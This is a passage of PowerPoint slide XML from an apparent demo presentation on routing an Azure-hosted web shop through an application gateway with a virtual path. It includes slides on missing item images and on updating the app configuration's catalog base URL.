                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F4520E5-85DC-B799-0CC4-AD10116646DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189186" y="3110586"/>
            <a:ext cx="843501" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>shop</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Textfeld 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4156BE08-3D13-3F2E-60F6-E6918F80406B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120902" y="1956915"/>
            <a:ext cx="4105656" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://agw-demo-04....azure.com/shop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Pfeil: nach rechts 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6DEB4EE-6A06-1786-650C-0EE12207B370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5365282" y="1857992"/>
            <a:ext cx="525710" cy="56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4" name="Textfeld 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088F4AE7-0B9C-0B37-DCF0-D948172018E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6845600" y="1953592"/>
            <a:ext cx="5076119" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://webshop-agw-demo-04.azurewebsites.net/</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Inhaltsplatzhalter 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E706932-EF26-0D47-6940-1CE2FF4E34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1226" y="1761742"/>
            <a:ext cx="759676" cy="759676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Grafik 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBA62D7-89C3-01C6-6F10-25E89118BE2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82868" y="1810214"/>
            <a:ext cx="662732" cy="662732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Pfeil: nach rechts 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D32C450-329D-39CB-D244-DE28B922D050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8793273" y="2173369"/>
            <a:ext cx="417902" cy="702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28687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B8CFCF-EEAF-2AA3-0703-05198D1764AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134618" y="706197"/>
            <a:ext cx="9922764" cy="1294228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Add Virtual Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE81DAFE-8BD5-BAFC-D1FB-07CF7C1141A9}"/>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1216152" y="2283278"/>
            <a:ext cx="9159496" cy="43735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hteck: abgerundete Ecken 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0E2C1D9-AA87-B779-FE0D-6543ACA3CD30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931531" y="5925312"/>
            <a:ext cx="1371600" cy="589496"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150"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de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE5639F4-E395-3EF5-FBF5-94E11217495C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="1532382"/>
            <a:ext cx="6693408" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://webshop-agw-demo-02.azurewebsites.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://webshop-agw-demo-02.azurewebsites.net/shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206580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2E48F74-102D-975F-CB9F-E5FF024C1D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" dirty="0" err="1"/>
              <a:t>Announcements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" dirty="0"/>
              <a:t> Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" dirty="0" err="1"/>
              <a:t>Build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3600" dirty="0"/>
              <a:t> 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9FB99D-A5B7-DCEF-681F-2F074FF440DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1476796592"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="256684" y="1451472"/>
          <a:ext cx="11603084" cy="4217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feld 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC88429-1967-2AF4-FF18-A791C856969B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6349805"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://news.microsoft.com/build2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3506172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1DFEF2-094F-C081-4B38-A5782592A12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Virtual Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>fixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>, but…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F126267-F288-A374-DF41-66890F6502A4}"/>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578039" y="1937120"/>
            <a:ext cx="7035921" cy="44922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Pfeil: nach rechts 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{167F7230-42F7-B312-6647-08E7FA5C9E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2009775" y="4600575"/>
            <a:ext cx="749239" cy="523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Textfeld 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4146C4A-D520-212C-E3DA-CE609F6D9A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437947" y="4539346"/>
            <a:ext cx="1486304" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Item </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>images</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>missing</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2399665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2B2845-9959-4D66-4F03-54C9F12F934E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C41453-5720-872C-6F13-B9F8D6270070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Option 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>App.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7211E0C6-57A5-B823-A8AA-64E2A9558EB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1341745" y="3081528"/>
            <a:ext cx="4566818" cy="3108134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</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a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CatalogBaseUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</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a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ConnectionStrings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CatalogConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"…"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</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a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IdentityConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"…"</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  },</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a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
